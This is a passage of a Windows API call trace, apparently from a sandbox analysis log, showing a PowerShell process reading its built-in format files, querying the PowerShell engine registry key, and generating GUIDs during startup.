	[0549.032] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.032] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.032] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.032] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.032] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.033] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.033] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.034] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.035] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.035] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.035] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.036] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.036] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.036] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.036] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.039] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.039] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.040] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.040] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0549.040] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0xe67, lpOverlapped=0x0) returned 1
	[0549.040] ReadFile (in: hFile=0x31c, lpBuffer=0x38d2797, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d2797*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0549.040] ReadFile (in: hFile=0x31c, lpBuffer=0x38d31c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x38d31c8*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0549.040] CloseHandle (hObject=0x31c) returned 1
	[0549.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0549.041] SetErrorMode (uMode=0x1) returned 0x1
	[0549.041] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d060 | out: lpFileInformation=0x24d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0549.041] SetErrorMode (uMode=0x1) returned 0x1
	[0549.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0549.041] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d148 | out: phkResult=0x24d148*=0x31c) returned 0x0
	[0549.041] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d0cc, lpData=0x0, lpcbData=0x24d0c8*=0x0 | out: lpType=0x24d0cc*=0x1, lpData=0x0, lpcbData=0x24d0c8*=0x56) returned 0x0
	[0549.041] CoTaskMemAlloc (cb=0x5a) returned 0x19a370
	[0549.041] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d09c, lpData=0x19a370, lpcbData=0x24d098*=0x56 | out: lpType=0x24d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d098*=0x56) returned 0x0
	[0549.041] CoTaskMemFree (pv=0x19a370) 
	[0549.041] RegCloseKey (hKey=0x31c) returned 0x0
	[0549.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0549.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0549.047] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x78c4f0c, Data2=0x9efd, Data3=0x41f4, Data4=([0]=0x80, [1]=0x93, [2]=0x6c, [3]=0xb0, [4]=0xfc, [5]=0xd5, [6]=0x13, [7]=0xcc))) returned 0x0
	[0549.048] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x14b4f180, Data2=0x18fb, Data3=0x4f41, Data4=([0]=0x9d, [1]=0x63, [2]=0x5e, [3]=0x30, [4]=0x54, [5]=0x66, [6]=0xc8, [7]=0xd3))) returned 0x0
	[0549.048] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xf6ff0baa, Data2=0x84a5, Data3=0x4219, Data4=([0]=0x9e, [1]=0xbf, [2]=0xfa, [3]=0xc4, [4]=0xc2, [5]=0x8b, [6]=0x49, [7]=0x86))) returned 0x0
	[0549.049] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x57d50896, Data2=0x94f8, Data3=0x40d0, Data4=([0]=0x95, [1]=0x33, [2]=0x13, [3]=0x65, [4]=0xd3, [5]=0xaf, [6]=0xf7, [7]=0x59))) returned 0x0
	[0549.049] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x12b6890b, Data2=0x8b61, Data3=0x49a8, Data4=([0]=0xb3, [1]=0xa2, [2]=0x41, [3]=0x38, [4]=0xd0, [5]=0x2a, [6]=0xdb, [7]=0xef))) returned 0x0
	[0549.050] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x89890dab, Data2=0x3f24, Data3=0x403f, Data4=([0]=0x82, [1]=0xef, [2]=0xbb, [3]=0x3f, [4]=0xbf, [5]=0xad, [6]=0x9d, [7]=0x9f))) returned 0x0
	[0549.051] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x177b394f, Data2=0xfb3b, Data3=0x4f75, Data4=([0]=0x9a, [1]=0xf8, [2]=0xe7, [3]=0x3d, [4]=0xc4, [5]=0x70, [6]=0x7d, [7]=0x69))) returned 0x0
	[0549.051] VirtualQuery (in: lpAddress=0x24bd20, lpBuffer=0x24cbe0, dwLength=0x30 | out: lpBuffer=0x24cbe0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0549.053] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xf1980626, Data2=0xf418, Data3=0x4cfa, Data4=([0]=0xa7, [1]=0x26, [2]=0x87, [3]=0x79, [4]=0xeb, [5]=0xeb, [6]=0x93, [7]=0x16))) returned 0x0
	[0549.053] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x862ecb76, Data2=0xece6, Data3=0x47b4, Data4=([0]=0x97, [1]=0xfd, [2]=0xee, [3]=0xa6, [4]=0x5f, [5]=0xa0, [6]=0xf3, [7]=0x20))) returned 0x0
	[0549.054] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x2bd13720, Data2=0x232c, Data3=0x4468, Data4=([0]=0x8b, [1]=0xcc, [2]=0xb6, [3]=0xee, [4]=0xb1, [5]=0x99, [6]=0x7a, [7]=0x4c))) returned 0x0
	[0549.054] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x6074a445, Data2=0xb219, Data3=0x4da5, Data4=([0]=0x97, [1]=0x42, [2]=0xba, [3]=0xb2, [4]=0xd3, [5]=0x56, [6]=0x76, [7]=0xf))) returned 0x0
	[0549.055] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x20141232, Data2=0xae14, Data3=0x4b25, Data4=([0]=0x99, [1]=0xb6, [2]=0xf2, [3]=0xce, [4]=0xf6, [5]=0x99, [6]=0x12, [7]=0x7a))) returned 0x0
	[0549.055] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x38684416, Data2=0x7d78, Data3=0x4fca, Data4=([0]=0x9c, [1]=0x46, [2]=0xb2, [3]=0xf8, [4]=0xd9, [5]=0x13, [6]=0xb3, [7]=0x9d))) returned 0x0
	[0549.055] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x60c9b282, Data2=0x8437, Data3=0x4904, Data4=([0]=0xa1, [1]=0x8b, [2]=0xd5, [3]=0x40, [4]=0x94, [5]=0xfb, [6]=0xde, [7]=0xc6))) returned 0x0
	[0549.055] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x748f5354, Data2=0xa10a, Data3=0x4185, Data4=([0]=0xa2, [1]=0x6c, [2]=0x8, [3]=0x55, [4]=0xf8, [5]=0x3d, [6]=0xe1, [7]=0xa0))) returned 0x0
	[0549.055] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xd48fe3f1, Data2=0x9e35, Data3=0x4429, Data4=([0]=0x8a, [1]=0x43, [2]=0xe9, [3]=0x29, [4]=0x8a, [5]=0x54, [6]=0xfe, [7]=0xfe))) returned 0x0
	[0549.056] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x95ca29c5, Data2=0x3c2b, Data3=0x49c7, Data4=([0]=0x9a, [1]=0x98, [2]=0x3f, [3]=0x89, [4]=0x29, [5]=0x6b, [6]=0x2a, [7]=0xfe))) returned 0x0
	[0549.056] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x74a8d929, Data2=0x4cc4, Data3=0x4561, Data4=([0]=0x9a, [1]=0xd5, [2]=0xc1, [3]=0x83, [4]=0x48, [5]=0x9d, [6]=0xeb, [7]=0x40))) returned 0x0
	[0549.056] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x4980cefd, Data2=0x8ab6, Data3=0x4e26, Data4=([0]=0x92, [1]=0x39, [2]=0x7e, [3]=0x5a, [4]=0x38, [5]=0x3d, [6]=0x3a, [7]=0xa8))) returned 0x0
	[0549.057] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x8db93cd5, Data2=0x9bfc, Data3=0x4e49, Data4=([0]=0x8f, [1]=0x7, [2]=0x67, [3]=0xde, [4]=0x5a, [5]=0x3e, [6]=0xbd, [7]=0xf9))) returned 0x0
	[0549.057] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x5d6eddea, Data2=0x5628, Data3=0x4244, Data4=([0]=0x8b, [1]=0xf2, [2]=0x28, [3]=0xf0, [4]=0x2, [5]=0xd4, [6]=0xa5, [7]=0xb6))) returned 0x0
	[0549.058] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x94cec773, Data2=0x1cd7, Data3=0x4f08, Data4=([0]=0xb2, [1]=0x57, [2]=0xce, [3]=0x98, [4]=0x40, [5]=0x5a, [6]=0xed, [7]=0x36))) returned 0x0
	[0549.058] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xda474922, Data2=0xf68e, Data3=0x45f5, Data4=([0]=0xa8, [1]=0xab, [2]=0x39, [3]=0x6c, [4]=0xb9, [5]=0x44, [6]=0xf1, [7]=0xcf))) returned 0x0
	[0549.058] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xe69bcb9c, Data2=0x6014, Data3=0x48b0, Data4=([0]=0x83, [1]=0x95, [2]=0x2b, [3]=0x42, [4]=0x2a, [5]=0x80, [6]=0x68, [7]=0x93))) returned 0x0
	[0549.058] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xee0d722f, Data2=0xd326, Data3=0x4cff, Data4=([0]=0x94, [1]=0x60, [2]=0x54, [3]=0x73, [4]=0xab, [5]=0x51, [6]=0x8e, [7]=0x72))) returned 0x0
	[0549.059] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x453c371d, Data2=0x6714, Data3=0x44f1, Data4=([0]=0x97, [1]=0x85, [2]=0x98, [3]=0x96, [4]=0x93, [5]=0x86, [6]=0x16, [7]=0x5a))) returned 0x0
	[0549.059] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xd8e00fde, Data2=0xb941, Data3=0x49e8, Data4=([0]=0xa6, [1]=0xfa, [2]=0xe9, [3]=0x1e, [4]=0xe4, [5]=0xb2, [6]=0xf2, [7]=0x21))) returned 0x0
	[0549.059] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x9362ce45, Data2=0xd803, Data3=0x42b9, Data4=([0]=0xaa, [1]=0x5b, [2]=0xb0, [3]=0x39, [4]=0x66, [5]=0xf2, [6]=0x43, [7]=0xc4))) returned 0x0
	[0549.059] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x775eac91, Data2=0x1400, Data3=0x4307, Data4=([0]=0x8e, [1]=0x20, [2]=0xe8, [3]=0x3f, [4]=0xe3, [5]=0xcf, [6]=0x41, [7]=0xc6))) returned 0x0
	[0549.059] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x728b9a5d, Data2=0x6ef, Data3=0x4872, Data4=([0]=0xbe, [1]=0xed, [2]=0x49, [3]=0x70, [4]=0x29, [5]=0xdb, [6]=0x4b, [7]=0xb8))) returned 0x0
	[0549.060] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xa0923918, Data2=0xabf4, Data3=0x457e, Data4=([0]=0xa7, [1]=0xf6, [2]=0xf8, [3]=0x4c, [4]=0x5a, [5]=0x33, [6]=0x30, [7]=0xea))) returned 0x0
	[0549.060] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x88ebcef, Data2=0x48d5, Data3=0x4223, Data4=([0]=0xb5, [1]=0x22, [2]=0x54, [3]=0xd1, [4]=0x15, [5]=0x64, [6]=0xf2, [7]=0x9))) returned 0x0
	[0549.060] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xc38f0e52, Data2=0x2bfa, Data3=0x4d3f, Data4=([0]=0x9e, [1]=0xff, [2]=0xb2, [3]=0xd2, [4]=0x8a, [5]=0xac, [6]=0x41, [7]=0x70))) returned 0x0
	[0550.032] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x583687f5, Data2=0x12be, Data3=0x4bd5, Data4=([0]=0xbe, [1]=0x31, [2]=0x6, [3]=0xc3, [4]=0x38, [5]=0x91, [6]=0xb5, [7]=0xd))) returned 0x0
	[0550.032] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x41633919, Data2=0x6265, Data3=0x4406, Data4=([0]=0x97, [1]=0xba, [2]=0xe4, [3]=0xef, [4]=0xdb, [5]=0xb6, [6]=0xc2, [7]=0xaf))) returned 0x0
	[0550.033] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xd9ea5533, Data2=0xd973, Data3=0x473b, Data4=([0]=0x9e, [1]=0x81, [2]=0x2, [3]=0x51, [4]=0x61, [5]=0x56, [6]=0xc2, [7]=0x85))) returned 0x0
	[0550.033] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x5a5fff35, Data2=0x20a5, Data3=0x4091, Data4=([0]=0x91, [1]=0x5, [2]=0xcb, [3]=0x3, [4]=0x36, [5]=0x5, [6]=0x46, [7]=0x70))) returned 0x0
	[0550.034] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x3f7aa421, Data2=0x843, Data3=0x4aec, Data4=([0]=0x95, [1]=0x2f, [2]=0x7, [3]=0x0, [4]=0xea, [5]=0x23, [6]=0xde, [7]=0xd1))) returned 0x0
	[0550.034] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x460c38f9, Data2=0xeb7c, Data3=0x4ecc, Data4=([0]=0x93, [1]=0x45, [2]=0x2f, [3]=0xab, [4]=0x29, [5]=0xaa, [6]=0x43, [7]=0xc8))) returned 0x0
	[0550.034] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x704fdef1, Data2=0xa1a5, Data3=0x4c02, Data4=([0]=0x95, [1]=0x17, [2]=0xd1, [3]=0xa5, [4]=0x33, [5]=0xd6, [6]=0xfa, [7]=0xab))) returned 0x0
	[0550.034] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x82872aad, Data2=0x1225, Data3=0x4ce7, Data4=([0]=0xb0, [1]=0xb3, [2]=0xf5, [3]=0xde, [4]=0xc1, [5]=0x41, [6]=0x67, [7]=0xdf))) returned 0x0
	[0550.035] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xdcff0d1c, Data2=0x8c96, Data3=0x4fef, Data4=([0]=0xa8, [1]=0xf4, [2]=0x67, [3]=0xa9, [4]=0x7, [5]=0x15, [6]=0x3c, [7]=0xd4))) returned 0x0
	[0550.036] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x1820c8a8, Data2=0x175e, Data3=0x4866, Data4=([0]=0xac, [1]=0x7a, [2]=0x11, [3]=0xd6, [4]=0x88, [5]=0xc8, [6]=0xdd, [7]=0xe1))) returned 0x0
	[0550.036] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xe5f919a5, Data2=0xe8f9, Data3=0x4091, Data4=([0]=0xb7, [1]=0xa0, [2]=0xdd, [3]=0xfa, [4]=0xe, [5]=0xb6, [6]=0x58, [7]=0x7))) returned 0x0
	[0550.036] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x549c0b61, Data2=0x8c15, Data3=0x403d, Data4=([0]=0xa8, [1]=0xd2, [2]=0x60, [3]=0x71, [4]=0x16, [5]=0x6f, [6]=0x10, [7]=0xfb))) returned 0x0
	[0550.036] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xff8f9acb, Data2=0x49d4, Data3=0x4de4, Data4=([0]=0x9c, [1]=0xc0, [2]=0x4d, [3]=0x5a, [4]=0xbe, [5]=0x2e, [6]=0x95, [7]=0x29))) returned 0x0
	[0550.037] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x6d01b3f6, Data2=0x1a3, Data3=0x4a8e, Data4=([0]=0xab, [1]=0x96, [2]=0x38, [3]=0xbe, [4]=0xe8, [5]=0xee, [6]=0x25, [7]=0xe2))) returned 0x0
	[0550.037] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xe18848b5, Data2=0x608a, Data3=0x45b5, Data4=([0]=0xaa, [1]=0xe, [2]=0x5c, [3]=0x36, [4]=0x10, [5]=0xd2, [6]=0x48, [7]=0x8))) returned 0x0
	[0550.038] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0550.038] GetFileType (hFile=0x31c) returned 0x1
	[0550.038] SetErrorMode (uMode=0x1) returned 0x1
	[0550.038] GetFileType (hFile=0x31c) returned 0x1
	[0550.039] ReadFile (in: hFile=0x31c, lpBuffer=0x3a31200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a31200*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0550.040] ReadFile (in: hFile=0x31c, lpBuffer=0x3a31200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a31200*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0550.041] ReadFile (in: hFile=0x31c, lpBuffer=0x3a31200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a31200*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0550.041] ReadFile (in: hFile=0x31c, lpBuffer=0x3a31200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a31200*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0550.043] ReadFile (in: hFile=0x31c, lpBuffer=0x3a31200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a31200*, lpNumberOfBytesRead=0x24d0b8*=0x8b4, lpOverlapped=0x0) returned 1
	[0550.043] ReadFile (in: hFile=0x31c, lpBuffer=0x3a3061c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a3061c*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0550.043] ReadFile (in: hFile=0x31c, lpBuffer=0x3a31200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a31200*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0550.043] CloseHandle (hObject=0x31c) returned 1
	[0550.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0550.043] SetErrorMode (uMode=0x1) returned 0x1
	[0550.043] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d060 | out: lpFileInformation=0x24d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0550.043] SetErrorMode (uMode=0x1) returned 0x1
	[0550.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0550.044] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d148 | out: phkResult=0x24d148*=0x31c) returned 0x0
